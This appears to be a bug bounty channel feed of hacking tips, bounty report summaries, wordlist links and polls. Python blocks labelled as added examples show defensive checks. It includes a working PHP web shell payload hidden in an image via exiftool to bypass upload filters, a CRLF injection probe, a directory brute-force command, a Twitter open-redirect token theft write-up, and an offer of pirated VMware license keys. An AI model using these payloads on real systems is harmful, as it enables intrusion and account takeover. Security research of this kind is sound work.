Which software do you use for virtual machines?
Anonymous Poll
• VMware: 56%
• Oracle's VirtualBox: 37%
• Hyper-V: 3%
• Other: 5%
👍2👏1
I love ❤️ all of you so much
Here are the license keys for VMware Workstation Pro 17:
There is no limit; you can use these license keys multiple times
❤57👍17🥰4👏4🎉4👌2
Bug Bounty Reports in Thread 🧵
Bug : GitHub For Bypassing Filtration of HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
👍5❤2🔥2🤩1
Check for CRLF injection 🎉
When a web app redirects you from http to https
For example: http://example.com/%0d%0aTest:%20Test
and at the same time watch the Network tab in your browser's developer tools for the 301 and 302 responses and check the headers 😃
#bugbounty #infosec
🤩6❤3👍3🥰1
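Why that probe shows up as an extra response header, and the server-side fix, as an added example that is not part of the original post. The two redirect builders and the `header_names` helper are hypothetical; the probe path is the one from the post.

```python
import re
from urllib.parse import quote, unquote

# Probe path taken from the post above: %0d%0a decodes to CR LF.
PROBE = "/%0d%0aTest:%20Test"
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def redirect_vulnerable(host, raw_path):
    """Weak pattern: the percent-decoded path is copied into Location as is."""
    location = "https://" + host + unquote(raw_path)
    return ("HTTP/1.1 301 Moved Permanently\r\n"
            "Location: " + location + "\r\n"
            "Content-Length: 0\r\n\r\n").encode("utf-8")


def redirect_hardened(host, raw_path):
    """Reject control characters, then re-encode the path before emitting it."""
    decoded = unquote(raw_path)
    if CONTROL_CHARS.search(decoded):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    location = "https://" + host + quote(decoded, safe="/")
    return ("HTTP/1.1 301 Moved Permanently\r\n"
            "Location: " + location + "\r\n"
            "Content-Length: 0\r\n\r\n").encode("utf-8")


def header_names(response):
    """Return the header names a client would parse from a raw response."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("utf-8", "replace")
    lines = head.split("\r\n")[1:]  # skip the status line
    return [l.split(":", 1)[0].strip().lower() for l in lines if ":" in l]


if __name__ == "__main__":
    print(header_names(redirect_vulnerable("example.com", PROBE)))
    print(redirect_hardened("example.com", PROBE).split(b"\r\n")[0])
    print(header_names(redirect_hardened("example.com", "/login")))
```

The hardened builder handles the path only; a real handler would apply the same control-character check to the query string.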
All Security Assessment Wordlists in One Place 📃 : 👇
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
🔥8👍6
General Discussion On :
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
YouTube
BUG BOUNTY - IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA ||ZERO DAY EP 02
Cyberhawk Security session with guest HARSH BOTHRA and host NJAY.
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👍9👎1🤩1
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
👍15😍5
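The server-side checks that stop the renamed, comment-tagged image from the tip above, as an added example that is not part of the original post. `check_upload`, `jpeg_with_comment` and the sample bytes are hypothetical and constructed; the embedded tag is an inert marker.

```python
import os
import secrets

# Allowed extensions and the magic bytes each file must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}


def check_upload(filename, data):
    """Return (stored_name, None) when accepted, else (None, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # "shell.php.jpg" has two extensions; some server configs run it as PHP.
    if len(parts) != 2 or not parts[0]:
        return None, "filename must have exactly one extension"
    ext = "." + parts[1]
    magic = ALLOWED.get(ext)
    if magic is None:
        return None, "extension not allowed"
    if not data.startswith(magic):
        return None, "content does not match extension"
    # Metadata such as a JPEG comment survives a magic-byte check.
    if b"<?php" in data.lower():
        return None, "embedded PHP open tag"
    # Never reuse the client-supplied name for the stored file.
    return secrets.token_hex(16) + ext, None


def jpeg_with_comment(comment):
    """Build a minimal constructed JPEG: SOI, one COM segment, EOI."""
    length = (len(comment) + 2).to_bytes(2, "big")
    return b"\xff\xd8" + b"\xff\xfe" + length + comment + b"\xff\xd9"


TAGGED = jpeg_with_comment(b"<?php /* constructed marker */ ?>")
CLEAN = jpeg_with_comment(b"constructed holiday photo")

if __name__ == "__main__":
    print(check_upload("shell.php.jpg", TAGGED))
    print(check_upload("photo.jpg", TAGGED))
    print(check_upload("photo.jpg", CLEAN))
```

Re-encoding the image and storing uploads where the web server does not execute scripts are stronger controls than the byte scan alone.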
Bug Bounty Tip 😃
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:
dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
👍23⚡4👏3🥰1🌚1
Parin's Burpsuite course for 0$, yeah totally #free.
https://www.udemy.com/course/bug-bounty-hunting-with-burp-suite/?couponCode=WHITEFRIDAYHERE
Coupons are limited. Be fast
Share to all.
#bugbounty #infosec
🔥8😢6🥰5👍3❤1🤨1
🔍 8 Best Recon Technique For Active Subdomain Enumeration
link : https://bugbountyguide.org/index.php/2022/11/26/8-best-recon-technique-for-active-subdomain-enumeration/
#bugbounty #infosec #cybersecurity
👍8🔥4👌1
Guys 👆! Which logo looks good for our new website bugbountyguide.org? I'll use whichever you choose (the one with the highest percentage will be considered) 👇
Anonymous Poll
• 1: 17%
• 2: 27%
• 3: 55%
👍9🥰2❤1
Bug Bounty Reports in Thread 🧵
#bugbounty #Infosec
Bug : OAuth 2.0
Open redirect leak of authenticity_token leads to full account takeover.
Organisation : Twitter
Bounty : $1400
==Start==
Impact URL:
https://mobile.twitter.com/messages/follow?recipient=/example.com
• When he clicks Follow
• This causes his POST request, which contains his authenticity_token, to be redirected to https://example.com
Impact : Can be used for anything like tweeting, following, sending messages, changing username, etc.
It can also be used to add a mobile number and then steal the account by recovering it via that mobile number.
Thanks for reading this amazing Bug Bounty Reports thread 🧵 on OAuth 2.0
Hope you like it 👍
🔥13❤4👍2
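A redirect-target check that would refuse the `recipient=/example.com` case from the report above, as an added example that is not part of the original post or of Twitter's code. It assumes the handler prefixes "/" to the parameter; `is_local_path`, `follow_redirect` and the `/messages` fallback are hypothetical.

```python
from urllib.parse import urlsplit


def is_local_path(location):
    """True only for an absolute path on the same site (no scheme, no host)."""
    if not location:
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7f for c in location):
        return False
    # Browsers treat a backslash like a slash, so normalise before checking.
    norm = location.replace("\\", "/")
    # "//host/..." is protocol-relative and leaves the site.
    if not norm.startswith("/") or norm.startswith("//"):
        return False
    parts = urlsplit(norm)
    return not parts.scheme and not parts.netloc


def follow_redirect(recipient, fallback="/messages"):
    """Hypothetical handler: build the Location value, then validate it.

    Assumption: the application prefixes "/" to the user-supplied value,
    so "/example.com" becomes "//example.com". The check runs on the final
    Location string, not on the raw parameter.
    """
    location = "/" + recipient
    if not is_local_path(location):
        location = fallback
    # 303 makes the client follow with GET; 307/308 would replay the POST
    # body (and any token in it) to the new location.
    return 303, location


if __name__ == "__main__":
    print(follow_redirect("/example.com"))   # value from the report
    print(follow_redirect("alice"))          # constructed benign value
```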